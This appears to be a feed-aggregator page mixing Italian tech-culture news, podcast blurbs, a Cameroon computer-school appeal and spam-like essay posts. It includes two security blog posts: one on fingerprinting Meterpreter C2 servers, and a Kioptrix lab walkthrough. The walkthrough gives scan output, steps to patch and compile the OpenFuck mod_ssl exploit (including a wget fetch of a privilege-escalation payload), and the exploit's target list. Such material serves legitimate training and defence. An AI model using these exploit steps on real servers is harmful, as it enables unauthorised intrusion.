April 28, 2017

In the news

Il museo sull'informatica vintage è in Sicilia - Wired.it


Wired.it

Il museo sull'informatica vintage è in Sicilia
Wired.it
Tre le organizzazioni coinvolte: il Freaknet Medialab appunto, Dyne.org, fucina di programmatori di software libero e il Poetry Hacklab, laboratorio di informatica libera. Ed è recente il sostegno di Interlogica, società veneta impegnata in progetti ...

April 26, 2017

In the news

Trasformatorio, arte performativa a Scaletta fino al 1 maggio - Lettera Emme


Lettera Emme

Trasformatorio, arte performativa a Scaletta fino al 1 maggio
Lettera Emme
L'evento è organizzato da Siddharte e Dyne.org con il patrocinio dell'Amministrazione comunale di Scaletta Zanclea e in collaborazione con WISH (World International Sicilian Heritage), CairoTronica (Simposio internazionale di Arti Digitali del Cairo ...

April 24, 2017

Data Knightmare

DataKnightmare 1x28 - La madre di tutti i data grab

Pensavate che dare cinque anni di cartelle cliniche di 700mila pazienti gratis e senza alcun controllo a Google fosse il peggio? Benvenuti alla madre di tutti i data grab, doveun primo ministro promette i dati sanitari di un'intera nazione a IBM. Senza obiettivi, senza controlli, senza garanzie, senza ritorno economico, senza gara. E senza farlo sapere a nessuno.

by Runtime Radio

April 21, 2017

videogame confessional forum

jeremy penner

So, my name's Jeremy Penner. I'm 33. Living right now in Ottawa, Ontario in Canada. I don't know, I've been programming since I was old enough to read, which was three or four. So, I've always been...

by david wolinsky

Informatic school is in southwest Cameroon

TECHSHARE 2016

TECHSHARE 2016

Linux Friends say thank you , Techshare for your unfailling support to Future Stair Accademy. Your support has made us grown to maturity, with many good player in all Categories, Both Male and Female.

PIC_0143 PIC_0144 PIC_0145 PIC_0146 PIC_0147 PIC_0148 PIC_0149 PIC_0150 PIC_0151 PIC_0152 PIC_0153 PIC_0154 PIC_0155 PIC_0156 PIC_0157 PIC_0159

 

20141101-0001IMG_20150104_042431 IMG_20150104_045115 IMG_20150104_04240920150711-000120150711-000320150711-000420150711-0007IMG_20161203_110524IMG_20161203_110522IMG_20161203_110519IMG_20161126_105022IMG_20161126_105020IMG_20161126_105016IMG_20161126_105012IMG_20161126_10494020150624-002920150620-000620150620-000420141204-000320150404-000120150404-0002IMG_20161203_110458IMG_20161130_141152IMG_20161115_165244IMG_20161115_165304IMG_20161115_165307IMG_20161115_165332IMG_20161115_165309girls1IMG-20161124-WA0000boysIMG-20161124-WA0004IMG-20161124-WA0005

20141101-0001

The President of Future Star Accademy is Eboumbou Jacques Marcel

Secretary is Ngainku Pauli Chanceline

Director is   Abassonga Noga Monique

Treasurer is Lolo Marthe Mireille

The Manager is Tabot Tabe Henry

Contact +237 674 956 363  and  +237 699 920 173

 

by admin

SWISS FRIENDS 2016

SWISS FRIENDS SUPPORT 2016

Swiss Friends have for one year now support the objective, activities and development of the Association of Linux Friends Limbe. Swiss friends have paid for ties to be put on the floor of the classrooms  and staircase, roofing of the building, paying Motivation for seven Teachers,  and of course provided a Toyota Rav4 for the Association. Linux Friends want to thank all the commitee members of Swiss Friends 2016  you have all work hard untill now. We know how challenging it has been but we give God all the Glory.

IMG_20150112_021206 photo 4 (3) photo 4 (4) photo 4 (2) photo 3 (4) photo 1 (5) photo 1 (4) photo 2 (4) photo 2 (3) photo 4 (2) photo 3 (4) photo 3 (3) photo 3 (2) photo 2 (5)OM6A7998IMG_20150112_021201 IMG_20150112_020921 IMG_20150112_020912 IMG_20150112_020745 IMG_20150112_020730 IMG_20150112_020653 IMG_20150112_020645

by admin

In the news

Trasformatorio, a Scaletta Zanclea artisti da tutto il mondo per un futuro sostenibile - Sikily News


Sikily News

Trasformatorio, a Scaletta Zanclea artisti da tutto il mondo per un futuro sostenibile
Sikily News
L'evento è organizzato da Siddharte e Dyne.org con il patrocinio dell'Amministrazione comunale e in collaborazione con WISH (World International Sicilian Heritage), CairoTronica (Simposio internazionale di Arti Digitali del Cairo), MUSIF (Museo ...

April 20, 2017

Informatic school is in southwest Cameroon

Computer School with Solar Section

Computer School with Solar Section

the educational project run by the Association of Linux Friends Limbe/Cameroon

 

Short Project Description. The Computer school run by the Linux Friends in Limbe /Cameroon includes an annual course providing basic knowledge in computer science as well as sporadic IT-courses on advanced level. Born out of necessity, the School more and more is also working on electricity production, thus responding to the fact that in vast parts of Cameroun the power supply needed for operating computers is not assured.

Students pay a symbolic school fee. The training curriculum and teaching methods (e-learning) are developed in accordance with the students’ request. Upon successful conclusion of the Annual Course students are allocated a certificate approved by the local authorities. The certificate is well appreciated by the participants and considered an entry point to working life. It particularly enables women to do a first important step towards the formal economical sector.

The educational program is offered in the day school and in evening classes. The teaching staff is recruited among the graduates of the school. At present, the majority of students and teachers are women. In the past year, 30 graduates (out of about 50 students enrolled) obtained the final certificate.

The Computer School of Linux Friends Limbe was initiated ten years ago by the Swiss Michel Pauli and the Cameroonian Chanceline Ngainku and is registered as a non-profit organization under the name Association of Linux Friends Limbe. As a result of continuous trials and inventive work of the local project team and thanks to worldwide advances in the field of mini-computers with low energy consumption, the school today disposes of a well-functioning technical equipment (basis: Raspberry Pi 2 and 3 and PiNet) with a total of 17 computer workstations. The school has Internet access. Part of the computer is solar energy-operated.

As a next big step the project aims to develop and stabilize the advanced level training. Students are to be able to further qualify in the ICT and solar systems sector. The objective is to realize a qualified training program based on the dual vocational training system as a model. The maintenance of the school’s network as well as commissioned work in the field of computer and solar system installation will allow students to put the acquired theoretical knowledge into practice. In order to maintain and develop the actual project-based knowhow it is required to expand the number of today eight staff positions (including administration and domestic services) to eleven adequately rewarded  working places.

The Context. In Cameroon, children from less well-off families generally have little chance to obtain a good professional education. The number of schools and study places offered by the State is not sufficient. Private schools are expensive. Only expensive schools are in a position to provide the necessary equipment and know-how to teach computer science. The dual vocational training as a training method is virtually non-existent. – Cameroon is ranked 152 out of 186 countries on the United Nations Human Development Index. Unemployment is high, at the same time the country is registering a shortage of skilled workers. Development projects working in the educational field complain about facing difficulties when trying to recruit specialists for computer and solar system installations. Such Projects may be considered potential partners providing commission work for educational projects trying to realize dual vocational training in Cameroon.  –  In Cameroonian economy women are equally active as men, however they tend to work in precarious conditions in the informal sector. If the family lacks money for the education of children, girls usually stand in the queue behind.

Objectives 2016/2017. End of 2016: The basic course (Beginners class) runs optimally. The responsible persons for the Advanced Level concept development are determined. End of 2017: A training concept and a financing plan on Advanced Level is designed. In view of a cooperation, contacts with Swiss training centers are initiated.

by admin

April 18, 2017

In the news

«Les documents publiés sur les maliciels présumés de la NSA donnent des informations aux criminels» - RT en français


RT en français

«Les documents publiés sur les maliciels présumés de la NSA donnent des informations aux criminels»
RT en français
Les prétendus outils de cyber-infiltration de la NSA pourraient être utilisés par toute personne capable de reproduire et de modifier du code informatique, estime Denis Roio, développeur et cofondateur de Dyne.org . Un groupe de pirates nommé Shadow ...
Protecting customers and evaluating risk – MSRC - TechNet Blogs - MicrosoftTechNet Blogs - Microsoft

all 34 news articles »

Tutto pronto per la terza edizione del Trasformatorio a Scaletta Zanclea - Stretto web


Stretto web

Tutto pronto per la terza edizione del Trasformatorio a Scaletta Zanclea
Stretto web
L'evento è organizzato da Siddharte e Dyne.org con il patrocinio dell'Amministrazione comunale di Scaletta Zanclea e in collaborazione con WISH (World International Sicilian Heritage), CairoTronica (Simposio internazionale di Arti Digitali del Cairo ...

April 17, 2017

Data Knightmare

dataKnightmare 1x27 - Timeo Danaos

"In dio abbiamo fiducia, gli altri portino i dati?" Sì, magari. Il DataKnightmare ha paura dei peracottari, perfino quando portano i dati -- anzi, soprattutto; perché oggi i dati servono a giustificare la decisione che si vuole prendere, non a scoprire quale sia la decisione giusta. Uno sfogo pasquale.

by Runtime Radio

April 16, 2017

In the news

'Released docs on alleged NSA malware provide instructions for criminals' - RT


RT

'Released docs on alleged NSA malware provide instructions for criminals'
RT
Alleged NSA cyber-infiltration tools empower criminals and intelligence agencies to develop more in this direction, and could be used by anyone able to reproduce and modify the code, software developer and co-founder of Dyne.org Denis Roio says.

Tomb, the Crypto Undertaker 2.4

… – Changes: This release introduces a major new feature with support for asymmetric encryption of Tomb keys using public/private GPG key pairs. It is now possible to protect a Tomb key using a GPG key (which can also be password-less for automations) as well encrypt a Tomb key for multiple recipients (list of G

by Jaromil

April 13, 2017

Trasformatorio

Easy Approaches To Manage Stress

On the opposite hand, your article might bring about a demand actions centered on patterns of cause and effect you have recognized. The reason and effect essay may end in numerous ways. Remember the length necessities of the article. Inside this section you’ll discover examples of essays belonging to different article kinds and manners of […]

by Victor

Advantages and Disadvantages of HMO and PPO Healthcare Plans

Guy understands he have totally freewill. Guys tend toward believe the cosmos was designed due to their unique use. If somebody understands which he or she can’t understand Lord, then they wont attempt judge additional individuals Every individual understands their particular talents, weaknesses and potential. There are numerous methods a willing individual has the skill […]

by Victor

April 11, 2017

Chokepoint

Hunting Red Team Meterpreter C2 Infrastructure

Introduction

This is part 2 of hunting Red Team C2 Infrastructure. Part 1 covered finding Empire C2 end points. In this post, we will show how to do the same for Meterpreter. There were no immediate crashing bugs found in the Meterpreter HTTP/S handler, but there is still enough information to profile these end points.

Meterpreter

Meterpreter is an advanced C2 infrastructure often used as a payload with the popular Metasploit exploit framework. It's cross-platform and highly extensible. In this post, we will focus on finding the reverse HTTP/S handlers for Meterpreter.

Meterpreter Headers

Using the HTTP request of GET / HTTP/1.0, the following headers were returned.


HTTP/1.1 200 OK
Connection: close
Server: Apache
Content-Length: 44

The thing that stands out here (similar to Empire) is the general lack of headers that would normally be present in a request. Also, the fact that we used HTTP/1.0 as the protocol, but the reply is still for HTTP/1.1

Meterpreter default page


<html><body><h1>It works!</h1></body></html>

Hashes of defaul page

MD5: c7b4690c8c46625ef0f328cd7a24a0a3
SHA1: 12179caec26a089cabcbb75c4dbe0bdfe60951f7
SHA2: 8f3ff2e2482468f3b9315a433b383f0cc0f9eb525889a34d4703b7681330a3fb

Finding Meterpreter Listeners with Shodan

Shodan is a search engine for Security Researchers. They routinely scan common ports across the Internet, and make the data publicly available, and easily searchable. APIs are also provided for automating a lot of the tasks required.

Using the common headers, and default web page listed above, we are able to narrow down the list of possible Meterpreter C2 node candidates on the Internet with a simple query.


'Server: Apache' 'It works!' -'Content-Type' 'Length: 44'

You'll notice that the results returned all are HTTP/1.1 with matching profiles that we scoped out above.

Random URLs

Another characteristic that makes Meterpreter listeners easy to identify, is that all requests that aren't to the backend result in the same response. Random URLs will get the same response as grabbing the index. Legitimate servers will typically produce a 404 error.

GET /lkafjdklfjasdklfjalkdjflkajd HTTP/1.0

Changing default values

There's no excuse for leaving your C2 node exposed to the entire Internet. Use whitelisting of IP space in order to keep your tests in scope, and avoid having other people attack your nodes. In order to change the default server and page discussed above, these are all part of the advanced settings.


use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 127.0.0.1
set LPORT 8000
show advanced
set MeterpreterServerName nginx
set HttpUnknownRequestResponse httml_here

Going beyond Shodan

In case there are any questions about the servers found being Meterpreter listeners, the following is a valid URI that will download Stage1 of the Meterpreter session from any given reverse HTTP/S listener.


GET /huO7Mf9GbAoRFBAVSfkxDwLTm3Wcz8n3kuXycv7k4vWV-_dXg3aY1iQy83Cejls15IeYlhUZ0QMT8S1zHKR33-Ga1rVIiV6QNFjXzTgr4lwNq_YR1tqyIbl9ddVzJ8UeYWJ0MJnThtVJ7d46IZnwHYok-XXZJrhqgUaaJMQtmCGCQWFA9tXMVtZtQEaR9Hse2Muw-P5TX4M7LKtm93LLFCT5i1NshdiwcWOnVJq HTTP/1.0

As we discussed in part 1, we can use Scans.io data in order to get a broader search of HTTPS servers. If you still have a copy of the data, you can run a zgrep search like the following to identify possible C2 nodes from this data.


zgrep 'PGh0bWw+PGJvZHk+PGgxPkl0IHdvcmtzITwvaDE+PC9ib2R5PjwvaHRtbD4=' 20170221-https.gz > /tmp/results.json

This may take several minutes to run, as the datasets are generally several gigabytes in size. The result will be a file containing JSON data for each host that returned the default Meterpreter HTML. You can parse this file and extract each IP address that should be tested.

Happy hunting.

by stderr (noreply@blogger.com)

Data Knightmare

dataKnightmare 1x26 - La sovranità sui dati

I nativi delle Americhe scambiavano oro e gemme in cambio di specchietti e perline di nessun valore. Oggi un ospedale pubblico cede milioni di cartelle cliniche pro bono a un'azienda di tecnologia perché sviluppi applicazioni diagnostiche. Trova le differenze. I dati sono forse il nuovo petrolio. Il problema è che le persone non sono fossili.

by Runtime Radio

April 09, 2017

Museo dell Informatica funzionante

Ora e sempre Resistenza: basic electronics course, 4th edition!

Tomorrow, April 11, 2017 until Venerdi 14 Aprile 2017 every day from 16:00 to 19:00,we will held the fourth edition of our fantastic basic electronics course, at the Officine Babilonia – Area Ex Officine Ferroviarie, Viale Giacomo Mancini, Cosenza. (Map)

This fourth edition is reserved to migrants and refugees hosted by “La Kasbah”, and will be held probably in English language.


Subscriptions are closed. We wait you for the next edition! 😉

L'articolo Ora e sempre Resistenza: basic electronics course, 4th edition! sembra essere il primo su Museo dell'Informatica Funzionante.

by asbesto

April 08, 2017

videogame confessional forum

gennifer hutchison

Okay, yeah. My name is Gennifer Hutchison. I'm 39 and I am based in Los Angeles. I'm a television writer and while I also write for features, I'm probably best known for writing on Breaking Bad and...

by mark riechers

April 07, 2017

In the news

Baarde Amsterdam met internet een digitaal monster? - Netkwesties


Netkwesties

Baarde Amsterdam met internet een digitaal monster?
Netkwesties
Winnaar werd Totem Open Health, een gecompliceerd open source project voor een veilig gebruik van digitaal verzamelde medische data. Een eervolle vermelding kreeg Dowse.eu van Dyne.org, een privacyhulp voor Internet of Things. De jury werd geleid ...

April 06, 2017

Chokepoint

Fixing and troubleshooting OpenFuck Exploit

In a previous post I had went over a walk through for Kioptrix Level 1. I had some issues and wanted to document them for anyone else that may run into those issues. I'll admit that my first problem was getting ahead of myself and trying to compile the source code before doing anything else. Finally googling gave the answer that was right smack dab in front of my face which is looking at the first 8 lines of the source


/*
* E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
*
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
*/

Beyond doing what is outlined on paulsec.github.io I had done a dist-upgrade to kali which seemed to have mess with some other settings. On top of installing libssl-dev it appeared I was missing some more ssl libraries and i'll be honest in saying i'm not sure which one it was that fixed my issue but I ended up installing libssl1.0-dev, libssl1.0.2, libssl1.1 as outlined below


root@kali:~# apt-cache search libssl
cl-plus-ssl - Common Lisp interface to OpenSSL
dcmtk - OFFIS DICOM toolkit command line utilities
dlang-openssl - D version of the C headers for openssl
libdcmtk-dev - OFFIS DICOM toolkit development libraries and headers
libdcmtk8 - OFFIS DICOM toolkit runtime libraries
libssl-dev - Secure Sockets Layer toolkit - development files
libssl-doc - Secure Sockets Layer toolkit - development documentation
libssl-ocaml - OCaml bindings for OpenSSL (runtime)
libssl-ocaml-dev - OCaml bindings for OpenSSL
libssl1.0-dev - Secure Sockets Layer toolkit - development files
libssl1.0.2 - Secure Sockets Layer toolkit - shared libraries
libssl1.1 - Secure Sockets Layer toolkit - shared libraries
perl-openssl-defaults - version compatibility baseline for Perl OpenSSL packages
r-cran-openssl - GNU R toolkit for encryption, signatures and certificates based on OpenSSL

The point of this is that you may have some missing libraries and trying to compile the source with these missing libraries doesn't exactly tell you that you're missing it or which ones. So if you are still getting errors when compiling after following what is outlined in paulsec.github.io you may want to try to install those other ssl libraries like I had to.

by k0ncepts (noreply@blogger.com)

Kioptrix 1 - Vulnhub Walkthrough - ssl_mod

Introduction

This is the second walk through I’m doing in the series. I’m tackling VM’s that are told to be similar to what’s on the OSCP PWK. Since I’ll be tackling the OSCP again in the future I figure this will be good practice in the meantime.

Kioptrix is a series itself with I believe 5 vulnerable VM’s geared towards beginners and since that’s still what I consider myself I’m going to tackle this whole series.

I had some trouble early on with the initial porting from VMWare vmdk to VirtualBox since that’s what I’m currently using. Porting it over isn’t hard just have to remember from the last time I did it. A quick google turned up the easy information I had forgotten. Also to note my version of VirtualBox defaulted to SSD for the hard drive but Kioptrix wasn’t having that giving me a kernel panic. Changing that to IDE hard drive fixed it. Next issue was getting dhcp to issue a ip address. I have pfsense running for internal network to keep my environment safe and not let anything in or out other than the host OS. For whatever reason Kioptrix didn’t like the intel pro100/1000 virtual chipset so I had to change that PCNet PCI II for it to get dhcp. I assume that has something to do with my version of VirtualBox and how old the kernel on the VM is. Either way I got it working.

Enumeration

As always I start enumerating the ports to see what’s open gathering the headers and versions and OS information. ENUMERATE ALL THE THINGS!


root@kali:~# nmap -sV -Pn -p1-65535 -A 172.16.2.13 --open

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-02 13:57 CDT
Nmap scan report for 172.16.2.13
Host is up (0.00033s latency).
Not shown: 65529 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32770/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2017-04-02T19:56:59+00:00; +59m19s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
32768/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:AF:56:C9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: 59m18s, deviation: 0s, median: 59m18s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC: (unknown)

TRACEROUTE
HOP RTT ADDRESS
1 0.33 ms 172.16.2.13

So just the open ports and services seem to give a great deal of information. We see both port 80 and 443 open so lets run nikto and see what it comes up with next.


root@kali:~# nikto -host 172.16.2.13
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.2.13
+ Target Hostname: 172.16.2.13
+ Target Port: 80
+ Start Time: 2017-04-05 21:25:29 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 22:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 17 error(s) and 19 item(s) reported on remote host
+ End Time: 2017-04-05 21:33:12 (GMT-5) (463 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

I highlighted the part that looked most interesting to me. Seems there's a remote buffer overflow which allows attackers to kill any process on the system with CVE 2002-0082 so lets google around for that.

Looks like we have an exploit from exploit-db! That's very hopeful. Prior to going all out and compiling and attacking read the source first. The source tells you it's outdated and needs to have some updates and shows a url to head to. Remember the CVE is from 2002! So heading over to the url it shows the following updates that need made.


apt-get install libssl-dev

add the following libraries to the source code


#include <openssl/rc4.h>
#include <openssl/md5.h>

Next search in the source code for "wget" without the quotes and replace the url you find with this one


http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
Next find line 961 and add "const" to the beginning should look like the following

const unsigned char *p, *end;

Finally we need to compile it


gcc -o OpenFuck 764.c -lcrypto

I had done mine slightly different since since my lab doesn't go out to the internet other than my kali box if I change the network configuration. So I downloaded ptrace-kmod.c from packetstormsecurity to my kali box and moved it to /var/www/html and started apache and changed the line with wget to 172.16.2.13/ptrace-kmod.c.


wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
mv ptrace-kmod.c /var/www/html
service apache2 start

Finally let's run the exploit!


root@kali:~# ./openfuck

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./openfuck target box [port] [-c N]

target - supported box eg: 0x00
box - hostname or IP address
port - port for ssl connection
-c open N connections. (use range 40-50 if u dont know)


Supported OffSet:
0x00 - Caldera OpenLinux (apache-1.3.26)
0x01 - Cobalt Sun 6.0 (apache-1.3.12)
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x03 - Cobalt Sun x (apache-1.3.26)
0x04 - Cobalt Sun x Fixed2 (apache-1.3.26)
0x05 - Conectiva 4 (apache-1.3.6)
0x06 - Conectiva 4.1 (apache-1.3.9)
0x07 - Conectiva 6 (apache-1.3.14)
0x08 - Conectiva 7 (apache-1.3.12)
0x09 - Conectiva 7 (apache-1.3.19)
0x0a - Conectiva 7/8 (apache-1.3.26)
0x0b - Conectiva 8 (apache-1.3.22)
0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)
0x0d - Debian GNU Linux (apache_1.3.19-1)
0x0e - Debian GNU Linux (apache_1.3.22-2)
0x0f - Debian GNU Linux (apache-1.3.22-2.1)
0x10 - Debian GNU Linux (apache-1.3.22-5)
0x11 - Debian GNU Linux (apache_1.3.23-1)
0x12 - Debian GNU Linux (apache_1.3.24-2.1)
0x13 - Debian Linux GNU Linux 2 (apache_1.3.24-2.1)
0x14 - Debian GNU Linux (apache_1.3.24-3)
0x15 - Debian GNU Linux (apache-1.3.26-1)
0x16 - Debian GNU Linux 3.0 Woody (apache-1.3.26-1)
0x17 - Debian GNU Linux (apache-1.3.27)
0x18 - FreeBSD (apache-1.3.9)
0x19 - FreeBSD (apache-1.3.11)
0x1a - FreeBSD (apache-1.3.12.1.40)
0x1b - FreeBSD (apache-1.3.12.1.40)
0x1c - FreeBSD (apache-1.3.12.1.40)
0x1d - FreeBSD (apache-1.3.12.1.40_1)
0x1e - FreeBSD (apache-1.3.12)
0x1f - FreeBSD (apache-1.3.14)
0x20 - FreeBSD (apache-1.3.14)
0x21 - FreeBSD (apache-1.3.14)
0x22 - FreeBSD (apache-1.3.14)
0x23 - FreeBSD (apache-1.3.14)
0x24 - FreeBSD (apache-1.3.17_1)
0x25 - FreeBSD (apache-1.3.19)
0x26 - FreeBSD (apache-1.3.19_1)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x2b - FreeBSD (apache-1.3.22)
0x2c - FreeBSD (apache-1.3.22_7)
0x2d - FreeBSD (apache_fp-1.3.23)
0x2e - FreeBSD (apache-1.3.24_7)
0x2f - FreeBSD (apache-1.3.24+2.8.8)
0x30 - FreeBSD 4.6.2-Release-p6 (apache-1.3.26)
0x31 - FreeBSD 4.6-Realease (apache-1.3.26)
0x32 - FreeBSD (apache-1.3.27)
0x33 - Gentoo Linux (apache-1.3.24-r2)
0x34 - Linux Generic (apache-1.3.14)
0x35 - Mandrake Linux X.x (apache-1.3.22-10.1mdk)
0x36 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x37 - Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)
0x38 - Mandrake Linux 7.2 (apache-1.3.14-2mdk)
0x39 - Mandrake Linux 7.2 (apache-1.3.14) 2
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3c - Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)
0x3d - Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)
0x3e - Mandrake Linux 8.0 (apache-1.3.19-3)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x40 - Mandrake Linux 8.2 (apache-1.3.23-4)
0x41 - Mandrake Linux 8.2 #2 (apache-1.3.23-4)
0x42 - Mandrake Linux 8.2 (apache-1.3.24)
0x43 - Mandrake Linux 9 (apache-1.3.26)
0x44 - RedHat Linux ?.? GENERIC (apache-1.3.12-1)
0x45 - RedHat Linux TEST1 (apache-1.3.12-1)
0x46 - RedHat Linux TEST2 (apache-1.3.12-1)
0x47 - RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)
0x48 - RedHat Linux 4.2 (apache-1.1.3-3)
0x49 - RedHat Linux 5.0 (apache-1.2.4-4)
0x4a - RedHat Linux 5.1-Update (apache-1.2.6)
0x4b - RedHat Linux 5.1 (apache-1.2.6-4)
0x4c - RedHat Linux 5.2 (apache-1.3.3-1)
0x4d - RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)
0x4e - RedHat Linux 6.0 (apache-1.3.6-7)
0x4f - RedHat Linux 6.0 (apache-1.3.6-7)
0x50 - RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)
0x51 - RedHat Linux 6.0 Update (apache-1.3.24)
0x52 - RedHat Linux 6.1 (apache-1.3.9-4)1
0x53 - RedHat Linux 6.1 (apache-1.3.9-4)2
0x54 - RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)
0x55 - RedHat Linux 6.1-fp2000 (apache-1.3.26)
0x56 - RedHat Linux 6.2 (apache-1.3.12-2)1
0x57 - RedHat Linux 6.2 (apache-1.3.12-2)2
0x58 - RedHat Linux 6.2 mod(apache-1.3.12-2)3
0x59 - RedHat Linux 6.2 update (apache-1.3.22-5.6)1
0x5a - RedHat Linux 6.2-Update (apache-1.3.22-5.6)2
0x5b - Redhat Linux 7.x (apache-1.3.22)
0x5c - RedHat Linux 7.x (apache-1.3.26-1)
0x5d - RedHat Linux 7.x (apache-1.3.27)
0x5e - RedHat Linux 7.0 (apache-1.3.12-25)1
0x5f - RedHat Linux 7.0 (apache-1.3.12-25)2
0x60 - RedHat Linux 7.0 (apache-1.3.14-2)
0x61 - RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)
0x62 - RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)
0x63 - RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)
0x64 - RedHat Linux 7.1 (apache-1.3.19-5)1
0x65 - RedHat Linux 7.1 (apache-1.3.19-5)2
0x66 - RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)
0x67 - RedHat Linux 7.1-Update (1.3.22-5.7.1)
0x68 - RedHat Linux 7.1 (apache-1.3.22-src)
0x69 - RedHat Linux 7.1-Update (1.3.27-1.7.1)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
